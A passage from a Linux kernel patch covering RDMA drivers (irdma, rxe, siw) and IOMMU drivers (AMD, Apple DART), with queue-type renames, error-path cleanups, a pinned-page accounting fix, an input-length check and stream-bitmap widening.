+-		return -EINVAL;
++		ret = -EINVAL;
++		goto out;
+ 	}
+ 
+ 	ret = rdma_user_mmap_io(uctx, vma, pfn, rdma_entry->npages * PAGE_SIZE,
+ 				prot, rdma_entry);
+ 
++out:
+ 	rdma_user_mmap_entry_put(rdma_entry);
+-
+ 	return ret;
+ }
+ 
+diff --git a/drivers/infiniband/hw/irdma/hw.c b/drivers/infiniband/hw/irdma/hw.c
+index ab246447520bd..2e1e2bad04011 100644
+--- a/drivers/infiniband/hw/irdma/hw.c
++++ b/drivers/infiniband/hw/irdma/hw.c
+@@ -483,6 +483,8 @@ static int irdma_save_msix_info(struct irdma_pci_f *rf)
+ 	iw_qvlist->num_vectors = rf->msix_count;
+ 	if (rf->msix_count <= num_online_cpus())
+ 		rf->msix_shared = true;
++	else if (rf->msix_count > num_online_cpus() + 1)
++		rf->msix_count = num_online_cpus() + 1;
+ 
+ 	pmsix = rf->msix_entries;
+ 	for (i = 0, ceq_idx = 0; i < rf->msix_count; i++, iw_qvinfo++) {
+diff --git a/drivers/infiniband/sw/rxe/rxe_queue.h b/drivers/infiniband/sw/rxe/rxe_queue.h
+index ed44042782fa7..c711cb98b9496 100644
+--- a/drivers/infiniband/sw/rxe/rxe_queue.h
++++ b/drivers/infiniband/sw/rxe/rxe_queue.h
+@@ -35,19 +35,26 @@
+ /**
+  * enum queue_type - type of queue
+  * @QUEUE_TYPE_TO_CLIENT:	Queue is written by rxe driver and
+- *				read by client. Used by rxe driver only.
++ *				read by client which may be a user space
++ *				application or a kernel ulp.
++ *				Used by rxe internals only.
+  * @QUEUE_TYPE_FROM_CLIENT:	Queue is written by client and
+- *				read by rxe driver. Used by rxe driver only.
+- * @QUEUE_TYPE_TO_DRIVER:	Queue is written by client and
+- *				read by rxe driver. Used by kernel client only.
+- * @QUEUE_TYPE_FROM_DRIVER:	Queue is written by rxe driver and
+- *				read by client. Used by kernel client only.
++ *				read by rxe driver.
++ *				Used by rxe internals only.
++ * @QUEUE_TYPE_FROM_ULP:	Queue is written by kernel ulp and
++ *				read by rxe driver.
++ *				Used by kernel verbs APIs only on
++ *				behalf of ulps.
++ * @QUEUE_TYPE_TO_ULP:		Queue is written by rxe driver and
++ *				read by kernel ulp.
++ *				Used by kernel verbs APIs only on
++ *				behalf of ulps.
+  */
+ enum queue_type {
+ 	QUEUE_TYPE_TO_CLIENT,
+ 	QUEUE_TYPE_FROM_CLIENT,
+-	QUEUE_TYPE_TO_DRIVER,
+-	QUEUE_TYPE_FROM_DRIVER,
++	QUEUE_TYPE_FROM_ULP,
++	QUEUE_TYPE_TO_ULP,
+ };
+ 
+ struct rxe_queue_buf;
+@@ -62,9 +69,9 @@ struct rxe_queue {
+ 	u32			index_mask;
+ 	enum queue_type		type;
+ 	/* private copy of index for shared queues between
+-	 * kernel space and user space. Kernel reads and writes
++	 * driver and clients. Driver reads and writes
+ 	 * this copy and then replicates to rxe_queue_buf
+-	 * for read access by user space.
++	 * for read access by clients.
+ 	 */
+ 	u32			index;
+ };
+@@ -97,19 +104,21 @@ static inline u32 queue_get_producer(const struct rxe_queue *q,
+ 
+ 	switch (type) {
+ 	case QUEUE_TYPE_FROM_CLIENT:
+-		/* protect user index */
++		/* used by rxe, client owns the index */
+ 		prod = smp_load_acquire(&q->buf->producer_index);
+ 		break;
+ 	case QUEUE_TYPE_TO_CLIENT:
++		/* used by rxe which owns the index */
+ 		prod = q->index;
+ 		break;
+-	case QUEUE_TYPE_FROM_DRIVER:
+-		/* protect driver index */
+-		prod = smp_load_acquire(&q->buf->producer_index);
+-		break;
+-	case QUEUE_TYPE_TO_DRIVER:
++	case QUEUE_TYPE_FROM_ULP:
++		/* used by ulp which owns the index */
+ 		prod = q->buf->producer_index;
+ 		break;
++	case QUEUE_TYPE_TO_ULP:
++		/* used by ulp, rxe owns the index */
++		prod = smp_load_acquire(&q->buf->producer_index);
++		break;
+ 	}
+ 
+ 	return prod;
+@@ -122,19 +131,21 @@ static inline u32 queue_get_consumer(const struct rxe_queue *q,
+ 
+ 	switch (type) {
+ 	case QUEUE_TYPE_FROM_CLIENT:
++		/* used by rxe which owns the index */
+ 		cons = q->index;
+ 		break;
+ 	case QUEUE_TYPE_TO_CLIENT:
+-		/* protect user index */
++		/* used by rxe, client owns the index */
+ 		cons = smp_load_acquire(&q->buf->consumer_index);
+ 		break;
+-	case QUEUE_TYPE_FROM_DRIVER:
+-		cons = q->buf->consumer_index;
+-		break;
+-	case QUEUE_TYPE_TO_DRIVER:
+-		/* protect driver index */
++	case QUEUE_TYPE_FROM_ULP:
++		/* used by ulp, rxe owns the index */
+ 		cons = smp_load_acquire(&q->buf->consumer_index);
+ 		break;
++	case QUEUE_TYPE_TO_ULP:
++		/* used by ulp which owns the index */
++		cons = q->buf->consumer_index;
++		break;
+ 	}
+ 
+ 	return cons;
+@@ -172,24 +183,31 @@ static inline void queue_advance_producer(struct rxe_queue *q,
+ 
+ 	switch (type) {
+ 	case QUEUE_TYPE_FROM_CLIENT:
+-		pr_warn("%s: attempt to advance client index\n",
+-			__func__);
++		/* used by rxe, client owns the index */
++		if (WARN_ON(1))
++			pr_warn("%s: attempt to advance client index\n",
++				__func__);
+ 		break;
+ 	case QUEUE_TYPE_TO_CLIENT:
++		/* used by rxe which owns the index */
+ 		prod = q->index;
+ 		prod = (prod + 1) & q->index_mask;
+ 		q->index = prod;
+-		/* protect user index */
++		/* release so client can read it safely */
+ 		smp_store_release(&q->buf->producer_index, prod);
+ 		break;
+-	case QUEUE_TYPE_FROM_DRIVER:
+-		pr_warn("%s: attempt to advance driver index\n",
+-			__func__);
+-		break;
+-	case QUEUE_TYPE_TO_DRIVER:
++	case QUEUE_TYPE_FROM_ULP:
++		/* used by ulp which owns the index */
+ 		prod = q->buf->producer_index;
+ 		prod = (prod + 1) & q->index_mask;
+-		q->buf->producer_index = prod;
++		/* release so rxe can read it safely */
++		smp_store_release(&q->buf->producer_index, prod);
++		break;
++	case QUEUE_TYPE_TO_ULP:
++		/* used by ulp, rxe owns the index */
++		if (WARN_ON(1))
++			pr_warn("%s: attempt to advance driver index\n",
++				__func__);
+ 		break;
+ 	}
+ }
+@@ -201,24 +219,30 @@ static inline void queue_advance_consumer(struct rxe_queue *q,
+ 
+ 	switch (type) {
+ 	case QUEUE_TYPE_FROM_CLIENT:
+-		cons = q->index;
+-		cons = (cons + 1) & q->index_mask;
++		/* used by rxe which owns the index */
++		cons = (q->index + 1) & q->index_mask;
+ 		q->index = cons;
+-		/* protect user index */
++		/* release so client can read it safely */
+ 		smp_store_release(&q->buf->consumer_index, cons);
+ 		break;
+ 	case QUEUE_TYPE_TO_CLIENT:
+-		pr_warn("%s: attempt to advance client index\n",
+-			__func__);
++		/* used by rxe, client owns the index */
++		if (WARN_ON(1))
++			pr_warn("%s: attempt to advance client index\n",
++				__func__);
++		break;
++	case QUEUE_TYPE_FROM_ULP:
++		/* used by ulp, rxe owns the index */
++		if (WARN_ON(1))
++			pr_warn("%s: attempt to advance driver index\n",
++				__func__);
+ 		break;
+-	case QUEUE_TYPE_FROM_DRIVER:
++	case QUEUE_TYPE_TO_ULP:
++		/* used by ulp which owns the index */
+ 		cons = q->buf->consumer_index;
+ 		cons = (cons + 1) & q->index_mask;
+-		q->buf->consumer_index = cons;
+-		break;
+-	case QUEUE_TYPE_TO_DRIVER:
+-		pr_warn("%s: attempt to advance driver index\n",
+-			__func__);
++		/* release so rxe can read it safely */
++		smp_store_release(&q->buf->consumer_index, cons);
+ 		break;
+ 	}
+ }
+diff --git a/drivers/infiniband/sw/rxe/rxe_verbs.c b/drivers/infiniband/sw/rxe/rxe_verbs.c
+index 88825edc7dce1..be13bcb4cc406 100644
+--- a/drivers/infiniband/sw/rxe/rxe_verbs.c
++++ b/drivers/infiniband/sw/rxe/rxe_verbs.c
+@@ -238,29 +238,24 @@ static int rxe_destroy_ah(struct ib_ah *ibah, u32 flags)
+ 
+ static int post_one_recv(struct rxe_rq *rq, const struct ib_recv_wr *ibwr)
+ {
+-	int err;
+ 	int i;
+ 	u32 length;
+ 	struct rxe_recv_wqe *recv_wqe;
+ 	int num_sge = ibwr->num_sge;
+ 	int full;
+ 
+-	full = queue_full(rq->queue, QUEUE_TYPE_TO_DRIVER);
+-	if (unlikely(full)) {
+-		err = -ENOMEM;
+-		goto err1;
+-	}
++	full = queue_full(rq->queue, QUEUE_TYPE_FROM_ULP);
++	if (unlikely(full))
++		return -ENOMEM;
+ 
+-	if (unlikely(num_sge > rq->max_sge)) {
+-		err = -EINVAL;
+-		goto err1;
+-	}
++	if (unlikely(num_sge > rq->max_sge))
++		return -EINVAL;
+ 
+ 	length = 0;
+ 	for (i = 0; i < num_sge; i++)
+ 		length += ibwr->sg_list[i].length;
+ 
+-	recv_wqe = queue_producer_addr(rq->queue, QUEUE_TYPE_TO_DRIVER);
++	recv_wqe = queue_producer_addr(rq->queue, QUEUE_TYPE_FROM_ULP);
+ 	recv_wqe->wr_id = ibwr->wr_id;
+ 
+ 	memcpy(recv_wqe->dma.sge, ibwr->sg_list,
+@@ -272,12 +267,9 @@ static int post_one_recv(struct rxe_rq *rq, const struct ib_recv_wr *ibwr)
+ 	recv_wqe->dma.cur_sge		= 0;
+ 	recv_wqe->dma.sge_offset	= 0;
+ 
+-	queue_advance_producer(rq->queue, QUEUE_TYPE_TO_DRIVER);
++	queue_advance_producer(rq->queue, QUEUE_TYPE_FROM_ULP);
+ 
+ 	return 0;
+-
+-err1:
+-	return err;
+ }
+ 
+ static int rxe_create_srq(struct ib_srq *ibsrq, struct ib_srq_init_attr *init,
+@@ -343,10 +335,7 @@ static int rxe_modify_srq(struct ib_srq *ibsrq, struct ib_srq_attr *attr,
+ 	if (err)
+ 		return err;
+ 
+-	err = rxe_srq_from_attr(rxe, srq, attr, mask, &ucmd, udata);
+-	if (err)
+-		return err;
+-	return 0;
++	return rxe_srq_from_attr(rxe, srq, attr, mask, &ucmd, udata);
+ }
+ 
+ static int rxe_query_srq(struct ib_srq *ibsrq, struct ib_srq_attr *attr)
+@@ -453,11 +442,11 @@ static int rxe_modify_qp(struct ib_qp *ibqp, struct ib_qp_attr *attr,
+ 
+ 	err = rxe_qp_chk_attr(rxe, qp, attr, mask);
+ 	if (err)
+-		goto err1;
++		return err;
+ 
+ 	err = rxe_qp_from_attr(qp, attr, mask, udata);
+ 	if (err)
+-		goto err1;
++		return err;
+ 
+ 	if ((mask & IB_QP_AV) && (attr->ah_attr.ah_flags & IB_AH_GRH))
+ 		qp->src_port = rdma_get_udp_sport(attr->ah_attr.grh.flow_label,
+@@ -465,9 +454,6 @@ static int rxe_modify_qp(struct ib_qp *ibqp, struct ib_qp_attr *attr,
+ 						  qp->attr.dest_qp_num);
+ 
+ 	return 0;
+-
+-err1:
+-	return err;
+ }
+ 
+ static int rxe_query_qp(struct ib_qp *ibqp, struct ib_qp_attr *attr,
+@@ -501,24 +487,21 @@ static int validate_send_wr(struct rxe_qp *qp, const struct ib_send_wr *ibwr,
+ 	struct rxe_sq *sq = &qp->sq;
+ 
+ 	if (unlikely(num_sge > sq->max_sge))
+-		goto err1;
++		return -EINVAL;
+ 
+ 	if (unlikely(mask & WR_ATOMIC_MASK)) {
+ 		if (length < 8)
+-			goto err1;
++			return -EINVAL;
+ 
+ 		if (atomic_wr(ibwr)->remote_addr & 0x7)
+-			goto err1;
++			return -EINVAL;
+ 	}
+ 
+ 	if (unlikely((ibwr->send_flags & IB_SEND_INLINE) &&
+ 		     (length > sq->max_inline)))
+-		goto err1;
++		return -EINVAL;
+ 
+ 	return 0;
+-
+-err1:
+-	return -EINVAL;
+ }
+ 
+ static void init_send_wr(struct rxe_qp *qp, struct rxe_send_wr *wr,
+@@ -639,17 +622,17 @@ static int post_one_send(struct rxe_qp *qp, const struct ib_send_wr *ibwr,
+ 
+ 	spin_lock_irqsave(&qp->sq.sq_lock, flags);
+ 
+-	full = queue_full(sq->queue, QUEUE_TYPE_TO_DRIVER);
++	full = queue_full(sq->queue, QUEUE_TYPE_FROM_ULP);
+ 
+ 	if (unlikely(full)) {
+ 		spin_unlock_irqrestore(&qp->sq.sq_lock, flags);
+ 		return -ENOMEM;
+ 	}
+ 
+-	send_wqe = queue_producer_addr(sq->queue, QUEUE_TYPE_TO_DRIVER);
++	send_wqe = queue_producer_addr(sq->queue, QUEUE_TYPE_FROM_ULP);
+ 	init_send_wqe(qp, ibwr, mask, length, send_wqe);
+ 
+-	queue_advance_producer(sq->queue, QUEUE_TYPE_TO_DRIVER);
++	queue_advance_producer(sq->queue, QUEUE_TYPE_FROM_ULP);
+ 
+ 	spin_unlock_irqrestore(&qp->sq.sq_lock, flags);
+ 
+@@ -735,14 +718,12 @@ static int rxe_post_recv(struct ib_qp *ibqp, const struct ib_recv_wr *wr,
+ 
+ 	if (unlikely((qp_state(qp) < IB_QPS_INIT) || !qp->valid)) {
+ 		*bad_wr = wr;
+-		err = -EINVAL;
+-		goto err1;
++		return -EINVAL;
+ 	}
+ 
+ 	if (unlikely(qp->srq)) {
+ 		*bad_wr = wr;
+-		err = -EINVAL;
+-		goto err1;
++		return -EINVAL;
+ 	}
+ 
+ 	spin_lock_irqsave(&rq->producer_lock, flags);
+@@ -761,7 +742,6 @@ static int rxe_post_recv(struct ib_qp *ibqp, const struct ib_recv_wr *wr,
+ 	if (qp->resp.state == QP_STATE_ERROR)
+ 		rxe_run_task(&qp->resp.task, 1);
+ 
+-err1:
+ 	return err;
+ }
+ 
+@@ -826,16 +806,9 @@ static int rxe_resize_cq(struct ib_cq *ibcq, int cqe, struct ib_udata *udata)
+ 
+ 	err = rxe_cq_chk_attr(rxe, cq, cqe, 0);
+ 	if (err)
+-		goto err1;
+-
+-	err = rxe_cq_resize_queue(cq, cqe, uresp, udata);
+-	if (err)
+-		goto err1;
+-
+-	return 0;
++		return err;
+ 
+-err1:
+-	return err;
++	return rxe_cq_resize_queue(cq, cqe, uresp, udata);
+ }
+ 
+ static int rxe_poll_cq(struct ib_cq *ibcq, int num_entries, struct ib_wc *wc)
+@@ -847,12 +820,12 @@ static int rxe_poll_cq(struct ib_cq *ibcq, int num_entries, struct ib_wc *wc)
+ 
+ 	spin_lock_irqsave(&cq->cq_lock, flags);
+ 	for (i = 0; i < num_entries; i++) {
+-		cqe = queue_head(cq->queue, QUEUE_TYPE_FROM_DRIVER);
++		cqe = queue_head(cq->queue, QUEUE_TYPE_TO_ULP);
+ 		if (!cqe)
+ 			break;
+ 
+ 		memcpy(wc++, &cqe->ibwc, sizeof(*wc));
+-		queue_advance_consumer(cq->queue, QUEUE_TYPE_FROM_DRIVER);
++		queue_advance_consumer(cq->queue, QUEUE_TYPE_TO_ULP);
+ 	}
+ 	spin_unlock_irqrestore(&cq->cq_lock, flags);
+ 
+@@ -864,7 +837,7 @@ static int rxe_peek_cq(struct ib_cq *ibcq, int wc_cnt)
+ 	struct rxe_cq *cq = to_rcq(ibcq);
+ 	int count;
+ 
+-	count = queue_count(cq->queue, QUEUE_TYPE_FROM_DRIVER);
++	count = queue_count(cq->queue, QUEUE_TYPE_TO_ULP);
+ 
+ 	return (count > wc_cnt) ? wc_cnt : count;
+ }
+@@ -880,7 +853,7 @@ static int rxe_req_notify_cq(struct ib_cq *ibcq, enum ib_cq_notify_flags flags)
+ 	if (cq->notify != IB_CQ_NEXT_COMP)
+ 		cq->notify = flags & IB_CQ_SOLICITED_MASK;
+ 
+-	empty = queue_empty(cq->queue, QUEUE_TYPE_FROM_DRIVER);
++	empty = queue_empty(cq->queue, QUEUE_TYPE_TO_ULP);
+ 
+ 	if ((flags & IB_CQ_REPORT_MISSED_EVENTS) && !empty)
+ 		ret = 1;
+@@ -921,26 +894,22 @@ static struct ib_mr *rxe_reg_user_mr(struct ib_pd *ibpd,
+ 	struct rxe_mr *mr;
+ 
+ 	mr = rxe_alloc(&rxe->mr_pool);
+-	if (!mr) {
+-		err = -ENOMEM;
+-		goto err2;
+-	}
+-
++	if (!mr)
++		return ERR_PTR(-ENOMEM);
+ 
+ 	rxe_get(pd);
+ 	mr->ibmr.pd = ibpd;
+ 
+ 	err = rxe_mr_init_user(rxe, start, length, iova, access, mr);
+ 	if (err)
+-		goto err3;
++		goto err1;
+ 
+ 	rxe_finalize(mr);
+ 
+ 	return &mr->ibmr;
+ 
+-err3:
++err1:
+ 	rxe_cleanup(mr);
+-err2:
+ 	return ERR_PTR(err);
+ }
+ 
+@@ -956,25 +925,22 @@ static struct ib_mr *rxe_alloc_mr(struct ib_pd *ibpd, enum ib_mr_type mr_type,
+ 		return ERR_PTR(-EINVAL);
+ 
+ 	mr = rxe_alloc(&rxe->mr_pool);
+-	if (!mr) {
+-		err = -ENOMEM;
+-		goto err1;
+-	}
++	if (!mr)
++		return ERR_PTR(-ENOMEM);
+ 
+ 	rxe_get(pd);
+ 	mr->ibmr.pd = ibpd;
+ 
+ 	err = rxe_mr_init_fast(max_num_sg, mr);
+ 	if (err)
+-		goto err2;
++		goto err1;
+ 
+ 	rxe_finalize(mr);
+ 
+ 	return &mr->ibmr;
+ 
+-err2:
+-	rxe_cleanup(mr);
+ err1:
++	rxe_cleanup(mr);
+ 	return ERR_PTR(err);
+ }
+ 
+diff --git a/drivers/infiniband/sw/siw/siw_mem.c b/drivers/infiniband/sw/siw/siw_mem.c
+index 61c17db70d658..bf69566e2eb63 100644
+--- a/drivers/infiniband/sw/siw/siw_mem.c
++++ b/drivers/infiniband/sw/siw/siw_mem.c
+@@ -398,7 +398,7 @@ struct siw_umem *siw_umem_get(u64 start, u64 len, bool writable)
+ 
+ 	mlock_limit = rlimit(RLIMIT_MEMLOCK) >> PAGE_SHIFT;
+ 
+-	if (num_pages + atomic64_read(&mm_s->pinned_vm) > mlock_limit) {
++	if (atomic64_add_return(num_pages, &mm_s->pinned_vm) > mlock_limit) {
+ 		rv = -ENOMEM;
+ 		goto out_sem_up;
+ 	}
+@@ -411,18 +411,16 @@ struct siw_umem *siw_umem_get(u64 start, u64 len, bool writable)
+ 		goto out_sem_up;
+ 	}
+ 	for (i = 0; num_pages; i++) {
+-		int got, nents = min_t(int, num_pages, PAGES_PER_CHUNK);
+-
+-		umem->page_chunk[i].plist =
++		int nents = min_t(int, num_pages, PAGES_PER_CHUNK);
++		struct page **plist =
+ 			kcalloc(nents, sizeof(struct page *), GFP_KERNEL);
+-		if (!umem->page_chunk[i].plist) {
++
++		if (!plist) {
+ 			rv = -ENOMEM;
+ 			goto out_sem_up;
+ 		}
+-		got = 0;
++		umem->page_chunk[i].plist = plist;
+ 		while (nents) {
+-			struct page **plist = &umem->page_chunk[i].plist[got];
+-
+ 			rv = pin_user_pages(first_page_va, nents,
+ 					    foll_flags | FOLL_LONGTERM,
+ 					    plist, NULL);
+@@ -430,12 +428,11 @@ struct siw_umem *siw_umem_get(u64 start, u64 len, bool writable)
+ 				goto out_sem_up;
+ 
+ 			umem->num_pages += rv;
+-			atomic64_add(rv, &mm_s->pinned_vm);
+ 			first_page_va += rv * PAGE_SIZE;
++			plist += rv;
+ 			nents -= rv;
+-			got += rv;
++			num_pages -= rv;
+ 		}
+-		num_pages -= got;
+ 	}
+ out_sem_up:
+ 	mmap_read_unlock(mm_s);
+@@ -443,6 +440,10 @@ out_sem_up:
+ 	if (rv > 0)
+ 		return umem;
+ 
++	/* Adjust accounting for pages not pinned */
++	if (num_pages)
++		atomic64_sub(num_pages, &mm_s->pinned_vm);
++
+ 	siw_umem_release(umem, false);
+ 
+ 	return ERR_PTR(rv);
+diff --git a/drivers/iommu/amd/init.c b/drivers/iommu/amd/init.c
+index 34029d1161073..7c14b1d32c8db 100644
+--- a/drivers/iommu/amd/init.c
++++ b/drivers/iommu/amd/init.c
+@@ -3475,15 +3475,26 @@ found:
+ 	return 1;
+ }
+ 
++#define ACPIID_LEN (ACPIHID_UID_LEN + ACPIHID_HID_LEN)
++
+ static int __init parse_ivrs_acpihid(char *str)
+ {
+ 	u32 seg = 0, bus, dev, fn;
+ 	char *hid, *uid, *p, *addr;
+-	char acpiid[ACPIHID_UID_LEN + ACPIHID_HID_LEN] = {0};
++	char acpiid[ACPIID_LEN] = {0};
+ 	int i;
+ 
+ 	addr = strchr(str, '@');
+ 	if (!addr) {
++		addr = strchr(str, '=');
++		if (!addr)
++			goto not_found;
++
++		++addr;
++
++		if (strlen(addr) > ACPIID_LEN)
++			goto not_found;
++
+ 		if (sscanf(str, "[%x:%x.%x]=%s", &bus, &dev, &fn, acpiid) == 4 ||
+ 		    sscanf(str, "[%x:%x:%x.%x]=%s", &seg, &bus, &dev, &fn, acpiid) == 5) {
+ 			pr_warn("ivrs_acpihid%s option format deprecated; use ivrs_acpihid=%s@%04x:%02x:%02x.%d instead\n",
+@@ -3496,6 +3507,9 @@ static int __init parse_ivrs_acpihid(char *str)
+ 	/* We have the '@', make it the terminator to get just the acpiid */
+ 	*addr++ = 0;
+ 
++	if (strlen(str) > ACPIID_LEN + 1)
++		goto not_found;
++
+ 	if (sscanf(str, "=%s", acpiid) != 1)
+ 		goto not_found;
+ 
+diff --git a/drivers/iommu/amd/iommu.c b/drivers/iommu/amd/iommu.c
+index d3b39d0416fa3..968e5e6668b26 100644
+--- a/drivers/iommu/amd/iommu.c
++++ b/drivers/iommu/amd/iommu.c
+@@ -558,6 +558,15 @@ static void amd_iommu_report_page_fault(struct amd_iommu *iommu,
+ 		 * prevent logging it.
+ 		 */
+ 		if (IS_IOMMU_MEM_TRANSACTION(flags)) {
++			/* Device not attached to domain properly */
++			if (dev_data->domain == NULL) {
++				pr_err_ratelimited("Event logged [Device not attached to domain properly]\n");
++				pr_err_ratelimited("  device=%04x:%02x:%02x.%x domain=0x%04x\n",
++						   iommu->pci_seg->id, PCI_BUS_NUM(devid), PCI_SLOT(devid),
++						   PCI_FUNC(devid), domain_id);
++				goto out;
++			}
++
+ 			if (!report_iommu_fault(&dev_data->domain->domain,
+ 						&pdev->dev, address,
+ 						IS_WRITE_REQUEST(flags) ?
+@@ -2394,12 +2403,17 @@ static int amd_iommu_def_domain_type(struct device *dev)
+ 		return 0;
+ 
+ 	/*
+-	 * Do not identity map IOMMUv2 capable devices when memory encryption is
+-	 * active, because some of those devices (AMD GPUs) don't have the
+-	 * encryption bit in their DMA-mask and require remapping.
++	 * Do not identity map IOMMUv2 capable devices when:
++	 *  - memory encryption is active, because some of those devices
++	 *    (AMD GPUs) don't have the encryption bit in their DMA-mask
++	 *    and require remapping.
++	 *  - SNP is enabled, because it prohibits DTE[Mode]=0.
+ 	 */
+-	if (!cc_platform_has(CC_ATTR_MEM_ENCRYPT) && dev_data->iommu_v2)
++	if (dev_data->iommu_v2 &&
++	    !cc_platform_has(CC_ATTR_MEM_ENCRYPT) &&
++	    !amd_iommu_snp_en) {
+ 		return IOMMU_DOMAIN_IDENTITY;
++	}
+ 
+ 	return 0;
+ }
+diff --git a/drivers/iommu/apple-dart.c b/drivers/iommu/apple-dart.c
+index 4f4a323be0d0f..06ca73bddb5a5 100644
+--- a/drivers/iommu/apple-dart.c
++++ b/drivers/iommu/apple-dart.c
+@@ -34,11 +34,10 @@
+ 
+ #include "dma-iommu.h"
+ 
+-#define DART_MAX_STREAMS 16
++#define DART_MAX_STREAMS 256
+ #define DART_MAX_TTBR 4
+ #define MAX_DARTS_PER_DEVICE 2
+ 
+-#define DART_STREAM_ALL 0xffff
+ 
+ #define DART_PARAMS1 0x00
+ #define DART_PARAMS_PAGE_SHIFT GENMASK(27, 24)
+@@ -85,6 +84,8 @@
+ struct apple_dart_hw {
+ 	u32 oas;
+ 	enum io_pgtable_fmt fmt;
++
++	int max_sid_count;
+ };
+ 
+ /*
+@@ -116,11 +117,15 @@ struct apple_dart {
+ 	spinlock_t lock;
+ 
+ 	u32 pgsize;
++	u32 num_streams;
+ 	u32 supports_bypass : 1;
+ 	u32 force_bypass : 1;
+ 
+ 	struct iommu_group *sid2group[DART_MAX_STREAMS];
+ 	struct iommu_device iommu;
++
++	u32 save_tcr[DART_MAX_STREAMS];
++	u32 save_ttbr[DART_MAX_STREAMS][DART_MAX_TTBR];
+ };
+ 
+ /*
+@@ -140,11 +145,11 @@ struct apple_dart {
+  */
+ struct apple_dart_stream_map {
+ 	struct apple_dart *dart;
+-	unsigned long sidmap;
++	DECLARE_BITMAP(sidmap, DART_MAX_STREAMS);
+ };
+ struct apple_dart_atomic_stream_map {
+ 	struct apple_dart *dart;
+-	atomic64_t sidmap;
++	atomic_long_t sidmap[BITS_TO_LONGS(DART_MAX_STREAMS)];
+ };
+ 
+ /*
+@@ -202,50 +207,55 @@ static struct apple_dart_domain *to_dart_domain(struct iommu_domain *dom)
+ static void
+ apple_dart_hw_enable_translation(struct apple_dart_stream_map *stream_map)
+ {
++	struct apple_dart *dart = stream_map->dart;
+ 	int sid;
+ 
+-	for_each_set_bit(sid, &stream_map->sidmap, DART_MAX_STREAMS)
++	for_each_set_bit(sid, stream_map->sidmap, dart->num_streams)
+ 		writel(DART_TCR_TRANSLATE_ENABLE,
+-		       stream_map->dart->regs + DART_TCR(sid));
++		       dart->regs + DART_TCR(sid));
+ }
+ 
+ static void apple_dart_hw_disable_dma(struct apple_dart_stream_map *stream_map)
+ {
++	struct apple_dart *dart = stream_map->dart;
+ 	int sid;
+ 
+-	for_each_set_bit(sid, &stream_map->sidmap, DART_MAX_STREAMS)
+-		writel(0, stream_map->dart->regs + DART_TCR(sid));
++	for_each_set_bit(sid, stream_map->sidmap, dart->num_streams)
++		writel(0, dart->regs + DART_TCR(sid));
+ }
+ 
+ static void
+ apple_dart_hw_enable_bypass(struct apple_dart_stream_map *stream_map)
+ {
++	struct apple_dart *dart = stream_map->dart;
+ 	int sid;
+ 
+ 	WARN_ON(!stream_map->dart->supports_bypass);
+-	for_each_set_bit(sid, &stream_map->sidmap, DART_MAX_STREAMS)
++	for_each_set_bit(sid, stream_map->sidmap, dart->num_streams)
+ 		writel(DART_TCR_BYPASS0_ENABLE | DART_TCR_BYPASS1_ENABLE,
+-		       stream_map->dart->regs + DART_TCR(sid));
++		       dart->regs + DART_TCR(sid));
+ }
+ 
+ static void apple_dart_hw_set_ttbr(struct apple_dart_stream_map *stream_map,
+ 				   u8 idx, phys_addr_t paddr)
+ {
++	struct apple_dart *dart = stream_map->dart;
+ 	int sid;
+ 
+ 	WARN_ON(paddr & ((1 << DART_TTBR_SHIFT) - 1));
+-	for_each_set_bit(sid, &stream_map->sidmap, DART_MAX_STREAMS)
++	for_each_set_bit(sid, stream_map->sidmap, dart->num_streams)
+ 		writel(DART_TTBR_VALID | (paddr >> DART_TTBR_SHIFT),
+-		       stream_map->dart->regs + DART_TTBR(sid, idx));
++		       dart->regs + DART_TTBR(sid, idx));
+ }
+ 
+ static void apple_dart_hw_clear_ttbr(struct apple_dart_stream_map *stream_map,
+ 				     u8 idx)
+ {
++	struct apple_dart *dart = stream_map->dart;
+ 	int sid;
+ 
+-	for_each_set_bit(sid, &stream_map->sidmap, DART_MAX_STREAMS)
+-		writel(0, stream_map->dart->regs + DART_TTBR(sid, idx));
++	for_each_set_bit(sid, stream_map->sidmap, dart->num_streams)
++		writel(0, dart->regs + DART_TTBR(sid, idx));
+ }
+ 
+ static void
+@@ -267,7 +277,7 @@ apple_dart_hw_stream_command(struct apple_dart_stream_map *stream_map,
+ 
+ 	spin_lock_irqsave(&stream_map->dart->lock, flags);
+ 
+-	writel(stream_map->sidmap, stream_map->dart->regs + DART_STREAM_SELECT);
++	writel(stream_map->sidmap[0], stream_map->dart->regs + DART_STREAM_SELECT);
+ 	writel(command, stream_map->dart->regs + DART_STREAM_COMMAND);
+ 
+ 	ret = readl_poll_timeout_atomic(
+@@ -280,7 +290,7 @@ apple_dart_hw_stream_command(struct apple_dart_stream_map *stream_map,
+ 	if (ret) {
+ 		dev_err(stream_map->dart->dev,
+ 			"busy bit did not clear after command %x for streams %lx\n",
+-			command, stream_map->sidmap);
++			command, stream_map->sidmap[0]);
+ 		return ret;
+ 	}
+ 
+@@ -298,6 +308,7 @@ static int apple_dart_hw_reset(struct apple_dart *dart)
+ {
+ 	u32 config;
+ 	struct apple_dart_stream_map stream_map;
++	int i;
+ 
+ 	config = readl(dart->regs + DART_CONFIG);
+ 	if (config & DART_CONFIG_LOCK) {
+@@ -307,12 +318,14 @@ static int apple_dart_hw_reset(struct apple_dart *dart)
+ 	}
+ 
+ 	stream_map.dart = dart;
+-	stream_map.sidmap = DART_STREAM_ALL;
++	bitmap_zero(stream_map.sidmap, DART_MAX_STREAMS);
++	bitmap_set(stream_map.sidmap, 0, dart->num_streams);
+ 	apple_dart_hw_disable_dma(&stream_map);
+ 	apple_dart_hw_clear_all_ttbrs(&stream_map);
+ 
+ 	/* enable all streams globally since TCR is used to control isolation */
+-	writel(DART_STREAM_ALL, dart->regs + DART_STREAMS_ENABLE);
++	for (i = 0; i < BITS_TO_U32(dart->num_streams); i++)
++		writel(U32_MAX, dart->regs + DART_STREAMS_ENABLE + 4 * i);
+ 
+ 	/* clear any pending errors before the interrupt is unmasked */
+ 	writel(readl(dart->regs + DART_ERROR), dart->regs + DART_ERROR);
+@@ -322,13 +335,16 @@ static int apple_dart_hw_reset(struct apple_dart *dart)
+ 
+ static void apple_dart_domain_flush_tlb(struct apple_dart_domain *domain)
+ {
+-	int i;
++	int i, j;
+ 	struct apple_dart_atomic_stream_map *domain_stream_map;
+ 	struct apple_dart_stream_map stream_map;
+ 
+ 	for_each_stream_map(i, domain, domain_stream_map) {
+ 		stream_map.dart = domain_stream_map->dart;
+-		stream_map.sidmap = atomic64_read(&domain_stream_map->sidmap);
++
++		for (j = 0; j < BITS_TO_LONGS(stream_map.dart->num_streams); j++)
++			stream_map.sidmap[j] = atomic_long_read(&domain_stream_map->sidmap[j]);
++
